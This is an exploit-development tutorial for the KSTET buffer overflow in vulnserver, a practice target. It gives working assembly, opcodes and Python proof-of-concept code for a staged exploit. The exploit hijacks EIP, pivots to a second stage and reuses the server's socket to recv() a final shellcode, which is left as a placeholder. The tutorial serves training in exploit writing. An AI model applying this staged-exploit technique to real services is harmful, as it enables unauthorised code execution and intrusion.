The purpose of this write-up is only to present a little trick I came up with while playing with vulnserver's (http://www.thegreycorner.com/2010/12/introducing-vulnserver.html) KSTET command (one of many protocol commands vulnerable to some sort of memory corruption bug). In spite of the hardcoded addresses, 32-bitness and general laziness, this technique should work in more modern conditions as well.

After hijacking EIP it turned out there was too little space, both above and below the overwritten saved RET, to store an actual Windows shellcode (250 bytes or more) that could run a reverse shell, create a user or run an executable from a publicly accessible SMB share.

Also, it did not seem possible to split the exploitation into two phases, first delivering the shellcode somewhere else in memory and then only using an egghunter (70 bytes to store the payload, enough for a 31-byte egghunter, not enough for the second-stage shellcode)... so I got inspired by xpn's solution to the ROP primer level 0 (https://blog.xpnsec.com/rop-primer-level-0/) where the final shellcode was read onto the stack from stdin by calling read().

Having only about 70 bytes of space, I decided to locate the current server socket descriptor and call recv on it, reading the final stage shellcode onto the stack and then executing it. This write-up describes the process in detail.

Controlling the execution

Below is the initial skeleton of a typical exploit for such an overflow. We control 70 bytes above the saved RET, then the saved RET itself ("AAAA"). Then we stuff 500 bytes of trash, where in the final version we'd like to put our shellcode, so we could easily jump to it by overwriting the saved RET with an address of a "JMP ESP" instruction (or something along these lines):
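A minimal sketch of such a skeleton in Python. The "KSTET " command prefix, the port 9999 (vulnserver's default), the host address and the helper names are assumptions made for illustration and are not taken from the original listing:

```python
import socket

OFFSET = 70       # bytes we control above the saved RET
TRASH_LEN = 500   # filler where we would like the shellcode to end up


def build_skeleton() -> bytes:
    """Build the KSTET command: filler, fake saved RET, trailing trash."""
    return b"KSTET " + b"\x90" * OFFSET + b"AAAA" + b"C" * TRASH_LEN


def send_payload(payload: bytes, host: str = "192.168.56.101", port: int = 9999) -> None:
    """Connect, read the banner and send the payload (host and port are assumptions)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)        # welcome banner
        s.sendall(payload)
```

Calling send_payload(build_skeleton()) against a debugged instance should reproduce the crash with EIP overwritten by 41414141.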

Once the crash occurs, we can see that we only control the first 20 bytes after the saved RET; the rest of the payload is ignored:

So, we're going to use the first 20 bytes below the saved RET as our first stage shellcode, only to jump to the 70 bytes above the saved RET, which will be our second stage. The second stage, in turn, will download the final (third) stage shellcode and execute it.

First, we search for a "JMP ESP" instruction so we can jump to the first stage.

A convenient way to do so is to use mona, searching for the JMP ESP opcode:

!mona find -s "\xff\xe4"

We pick an address that does not contain NULL characters, preferably from a module that uses as few safety features as possible (essfunc.dll is a perfect candidate):

The addresses will most likely differ on your system.

0x625011af will be used for the rest of this proof of concept.
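Before the address goes into the payload it has to be packed in little-endian order and checked for bad characters. A small sketch of that step, where the helper name pack_address and the default bad character set (NULL only) are assumptions:

```python
import struct

JMP_ESP = 0x625011AF  # address chosen above; it will most likely differ on your system


def pack_address(addr: int, bad_chars: bytes = b"\x00") -> bytes:
    """Pack a 32-bit address little-endian, refusing addresses with bad bytes."""
    packed = struct.pack("<I", addr)
    if any(byte in bad_chars for byte in packed):
        raise ValueError("address 0x%08X contains a bad character" % addr)
    return packed
```

For the address used here the packed value is b"\xaf\x11\x50\x62", which is the byte order in which it has to overwrite the saved RET.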

We toggle a breakpoint at it, so we can easily proceed from here in developing the further stages of the shellcode:

Now our PoC looks as follows (we used 20 NOPs as a holder for the first stage):
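A sketch of the PoC at this step, under the same assumptions as before (the "KSTET " prefix and the helper name are illustrative, not the original listing):

```python
import struct

JMP_ESP = 0x625011AF  # JMP ESP in essfunc.dll, as chosen above


def build_poc() -> bytes:
    """70-byte holder for the second stage, JMP ESP as the new RET, 20 NOPs for the first stage."""
    second_stage_holder = b"A" * 70
    saved_ret = struct.pack("<I", JMP_ESP)
    first_stage_holder = b"\x90" * 20
    return b"KSTET " + second_stage_holder + saved_ret + first_stage_holder
```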

We run the PoC and hit the breakpoint:

Once we do a step (F7), we can see the execution flow is redirected to the 20-byte NOP space, where our first stage will be located (so far, so good).

At the top we can see the second stage buffer, at the bottom we can see the first stage buffer. In between there is the overwritten RET pointer, currently pointing to the JMP ESP instruction that led us here:

First stage shellcode

We want our first stage shellcode to jump to the start of the second stage shellcode (there is not much more we can do at this point on the only 20 bytes we control).

Since we have just executed a JMP ESP, EIP is equal to ESP, so we don't need to retrieve the current EIP in order to change it. Instead, we simply copy our current ESP to a register of choice, subtract 70 bytes from it and perform a JMP to it:

PUSH ESP ; we PUSH the stack pointer to the stack
POP EDX ; we pop it back from the stack to EDX
SUB EDX,46 ; we subtract 70 (0x46, the debugger takes the operand as hex) from it, pointing at the beginning of the buffer for the second stage shellcode
JMP EDX ; we JMP to it

OllyDbg/Immunity Debugger allow assembling instructions inline while debugging (just hit space to edit), which is very handy in converting our assembly to opcode without the need of using additional tools like nasmshell or nasm itself:

So, our first stage is simply

\x54\x5A\x83\xEA\x46\xFF\xE2
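The same bytes annotated instruction by instruction, with a tiny model of where the jump lands. This is only an illustration; the jump_target helper is hypothetical:

```python
FIRST_STAGE = (
    b"\x54"          # PUSH ESP
    b"\x5A"          # POP EDX
    b"\x83\xEA\x46"  # SUB EDX,0x46  (70 decimal)
    b"\xFF\xE2"      # JMP EDX
)


def jump_target(esp: int) -> int:
    """Address the first stage jumps to, given ESP right after the JMP ESP."""
    return (esp - 0x46) & 0xFFFFFFFF
```

The whole stage takes 7 bytes, well within the 20 bytes we control below the saved RET.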

Also, during development, we can for convenience prepend it with an inline breakpoint (the \xCC instruction), as Immunity loses the breakpoint set on the initial JMP ESP with every restart. Just remember to remove the \xCC or replace it with a NOP in the final exploit, otherwise it will cause an unhandled exception leading to a crash!

At this stage, our PoC looks as follows (the NOPs in the first stage were only added for visibility, they won't ever get executed). The holder for the second stage was filled with NOPs as well:
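A sketch of this version of the PoC. The debug switch that toggles the inline \xCC breakpoint, the "KSTET " prefix and the helper name are assumptions added for illustration:

```python
import struct

JMP_ESP = 0x625011AF
FIRST_STAGE = b"\x54\x5A\x83\xEA\x46\xFF\xE2"  # PUSH ESP / POP EDX / SUB EDX,46 / JMP EDX


def build_poc(debug: bool = True) -> bytes:
    """NOP-filled second stage holder, JMP ESP, then the first stage padded to 20 bytes."""
    prefix = b"\xCC" if debug else b"\x90"      # inline breakpoint only while developing
    first_stage = (prefix + FIRST_STAGE).ljust(20, b"\x90")
    return b"KSTET " + b"\x90" * 70 + struct.pack("<I", JMP_ESP) + first_stage
```

With debug=False the breakpoint is replaced by a NOP, which is what the final exploit needs.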

As we can see, the first stage does its job, moving the execution flow to the second stage:

Second stage shellcode

Now, this is where the fun begins. As mentioned before, we want to use the existing server application's socket descriptor and call WS2_32.recv on it, so we can read as much data from it as we want, writing it to a location we want and then jump to it - or even better, write it to a suitable location so the execution flow slides to it naturally.

First, we find the place in code where the original WS2_32.recv is issued, so we can see how that takes place (e.g. what is its address and how arguments are passed, where to find them and so on).

Luckily, the section is not far away from the executable's entry point (the first instruction the program executes, and also the instruction we are at once we start it in the debugger):

As we scroll down we can see we are getting somewhere:

And here we go:

We toggle a breakpoint, restart the application, make a new client connection and send something to the server. The breakpoint is hit and we can see the stack:

The part that got our interest:

00FAF9E0 00000058 |Socket = 58
00FAF9E4 003A3CA0 |Buffer = 003A3CA0
00FAF9E8 00001000 |BufSize = 1000 (4096.)
00FAF9EC 00000000 |Flags =

Also (an Immunity/OllyDbg tip): if we hit space on the actual CALL instruction where our current breakpoint is, we can see the actual address of the instruction called (we will need this later):

Now we can compare the current stack pointer at the time of our execution hijack with the one recorded while the original WS2_32.recv was done. We are hoping to estimate the offset between the current stack pointer and the location of the socket descriptor, so we could use it again in our second stage.

As it turns out, the stack we are currently using points to the same location, which means the copy of the socket descriptor identifier used by the original recv() has been overwritten with further stack operations and the overflow itself:

Hoping to find a copy of it, we search the stack for its current value.

Right click on the CPU window - which represents the stack at the moment -> search for -> binary string -> 00 00 00 58 (the identifier of the socket at the time of developing, but we don't want to hardcode it as it would normally differ between systems and instances, hence the hassle to retrieve it dynamically).

We find another copy on the stack (00F2F969):

We calculate the offset between the location of the socket descriptor id copy and the current stack pointer at the time our second stage shellcode starts (119 DEC). This way we'll be able to dynamically retrieve the ID in our second stage shellcode.
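The arithmetic behind this offset can be sketched as below. The ESP value is not quoted in the text; it is derived here from the search hit and the 119-byte offset, so treat it as an interpretation. The sketch also shows that the 58 byte sits 3 bytes into the 00 00 00 58 match, which appears to be why the shellcode later subtracts 0x74 (116) rather than 119:

```python
SEARCH_HIT = 0x00F2F969                 # where the 00 00 00 58 pattern was found
OFFSET_TO_HIT = 119                     # offset quoted in the text (decimal)
PATTERN = bytes.fromhex("00000058")

# ESP at the start of the second stage, implied by the two values above
esp_at_second_stage = SEARCH_HIT + OFFSET_TO_HIT

# the 58 byte is the last byte of the match, i.e. the low byte of a little-endian DWORD
socket_dword = SEARCH_HIT + PATTERN.index(b"\x58")

offset_to_dword = esp_at_second_stage - socket_dword
print(hex(esp_at_second_stage), hex(socket_dword), hex(offset_to_dword))
```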

Also, there is one more problem we need to solve. Once we start executing our second stage, our EIP is slightly lower than the current ESP.

As the execution proceeds, the EIP will keep going towards upper values, while the ESP is expected to keep going towards lower values (here comes the Paint):

Also, we want to write the final stage shellcode on the stack, right below the second stage, so the execution goes directly to it, without the need to jump, as illustrated below:

Hence, once we have all the info needed to call WS2_32.recv(), we'll need to move the stack pointer above the current area of operation (by subtracting from it) to avoid any interference with the shellcode stage instructions:

So, the shellcode goes like this:

PUSH ESP
POP ECX ; we simply copy ESP to ECX, so we can make the calculation needed to fetch the socket descriptor id
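SUB CL,74 ; subtract 0x74 (116 DEC) from CL - now ECX points at the socket descriptor ID, which is what we need to pass to WS2_32.recv. The 119-byte offset measured earlier was to the start of the 00 00 00 58 search match; the 58 byte itself sits 3 bytes further, hence 116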
SUB ESP,50 ; we have to move the stack pointer (by 0x50) above the second stage shellcode (above the current EIP); otherwise any stack operations performed by the WS2_32.recv call we are about to make would corrupt it. This also avoids any collision with the buffer we are going to use for our final stage shellcode. From this point on we don't have to worry about it anymore.
XOR EDX,EDX ; zero EDX (the flags argument for recv)
PUSH EDX ; we push it first: arguments are passed via the stack in reverse order, so flags (the last argument of recv) goes first
ADD DH,2 ; now we turn EDX into 512 (0x200) by adding 2 to DH
PUSH EDX ; we push it to the stack (BufSize, the second value pushed)
; retrieve the current value of ESP to EBX
PUSH ESP
POP EBX
; increment it by 0x50 (this value was adjusted manually after experimenting a bit), so it points slightly below our current EIP
ADD EBX,50 ; this is the beginning of the buffer where the third stage will be written
PUSH EBX ; push the pointer to the buffer on the stack (the third value pushed)
; now, the last value to push - the socket descriptor, which is the first argument of recv - we push the value pointed to by ECX:
PUSH DWORD PTR DS:[ECX]
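To double-check the argument order and the buffer address, the instructions above can be modelled in a few lines of Python. This is a rough model only: the function name and the memory dictionary are hypothetical, and the example ESP is the value implied by the offsets discussed earlier:

```python
def simulate_second_stage(esp: int, memory: dict):
    """Model the register and stack effects of the argument setup."""
    # PUSH ESP / POP ECX / SUB CL,74: only the low byte of ECX changes
    ecx = (esp & 0xFFFFFF00) | (((esp & 0xFF) - 0x74) & 0xFF)
    esp -= 0x50                      # SUB ESP,50
    stack = {}

    def push(value: int) -> None:
        nonlocal esp
        esp -= 4
        stack[esp] = value

    edx = 0                          # XOR EDX,EDX
    push(edx)                        # flags
    edx += 0x200                     # ADD DH,2
    push(edx)                        # buffer size
    ebx = esp + 0x50                 # PUSH ESP / POP EBX / ADD EBX,50
    push(ebx)                        # buffer pointer
    push(memory[ecx])                # PUSH DWORD PTR DS:[ECX], the socket
    # read the four DWORDs from the top of the stack, as recv will see them
    return esp, [stack[esp + 4 * i] for i in range(4)]


esp, args = simulate_second_stage(0x00F2F9E0, {0x00F2F96C: 0x58})
print(hex(esp), [hex(a) for a in args])
```

Read from the top of the stack, the values come out in the order socket, buffer, size, flags, which matches the stack layout recorded at the original WS2_32.recv call. In this model the buffer starts 8 bytes below the ESP value seen at the start of the second stage.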

So, we are almost done.

Now we have to call the WS2_32.recv() function the same way the original server logic does. We take the address used by the original CALL instruction (0040252C - as it was emphasized we would need it later).

The problem we need to deal with is the fact the address starts with a NULL byte - which we cannot use in our shellcode.

So, to get round this, we are going to use a slightly modified version of it, e.g. 40252C11, and then shift it 8 bits to the right. This way the least significant byte (11) will vanish, while a null byte becomes the new most significant byte (40252C11 SHR 8 => 0040252C):

MOV EAX,40252C11
SHR EAX,8
CALL EAX
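The shift trick is easy to verify offline. In this sketch the helper name encode_for_shr and the filler byte parameter are assumptions; 0x11 is the filler used above:

```python
import struct

RECV_CALL_TARGET = 0x0040252C  # address taken from the original CALL instruction


def encode_for_shr(addr: int, filler: int = 0x11) -> int:
    """Return a NULL-free constant that becomes addr after SHR by 8 bits."""
    if addr >> 24 != 0:
        raise ValueError("the trick only applies when the top byte is NULL")
    if not 1 <= filler <= 0xFF:
        raise ValueError("filler must be a non-NULL byte")
    return ((addr << 8) | filler) & 0xFFFFFFFF


encoded = encode_for_shr(RECV_CALL_TARGET)
print(hex(encoded), struct.pack("<I", encoded).hex())
```

Any non-NULL filler byte works, since it is shifted out before the CALL.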

Our full PoC looks as follows:
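A sketch of how the pieces could be put together in Python. It is not the original listing: the "KSTET " prefix, the port 9999, the host, the one-second pause before sending the third stage and the 8-byte NOP sled in front of the second stage (added so that a landing address a few bytes off still works) are all assumptions:

```python
import socket
import struct
import time

JMP_ESP = 0x625011AF
FIRST_STAGE = b"\x54\x5A\x83\xEA\x46\xFF\xE2"
SECOND_STAGE = (
    b"\x54\x59"              # PUSH ESP / POP ECX
    b"\x80\xE9\x74"          # SUB CL,74
    b"\x83\xEC\x50"          # SUB ESP,50
    b"\x33\xD2\x52"          # XOR EDX,EDX / PUSH EDX   (flags)
    b"\x80\xC6\x02\x52"      # ADD DH,2 / PUSH EDX      (size = 512)
    b"\x54\x5B"              # PUSH ESP / POP EBX
    b"\x83\xC3\x50\x53"      # ADD EBX,50 / PUSH EBX    (buffer)
    b"\xFF\x31"              # PUSH DWORD PTR DS:[ECX]  (socket)
    b"\xB8\x11\x2C\x25\x40"  # MOV EAX,40252C11
    b"\xC1\xE8\x08"          # SHR EAX,8
    b"\xFF\xD0"              # CALL EAX
)
THIRD_STAGE = b"\xCC" * 500  # placeholder for the final shellcode


def build_kstet() -> bytes:
    """KSTET command carrying the second stage, the new RET and the first stage."""
    region = (b"\x90" * 8 + SECOND_STAGE).ljust(70, b"\x90")
    return b"KSTET " + region + struct.pack("<I", JMP_ESP) + FIRST_STAGE


def exploit(host: str = "192.168.56.101", port: int = 9999) -> None:
    """Send the overflow, then feed the third stage to the recv() call we triggered."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)              # welcome banner
        s.sendall(build_kstet())
        time.sleep(1)             # let the second stage reach its recv() call
        s.sendall(THIRD_STAGE)
```

The third stage is sent separately so that it is still waiting on the socket when the second stage calls WS2_32.recv.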

The stack during the execution of the second stage right before the third stage is delivered:

The stack right after the return from WS2_32.recv():

Yup, full of garbage we control:

Now we can replace the 500 "\xCC" with our favorite shellcode.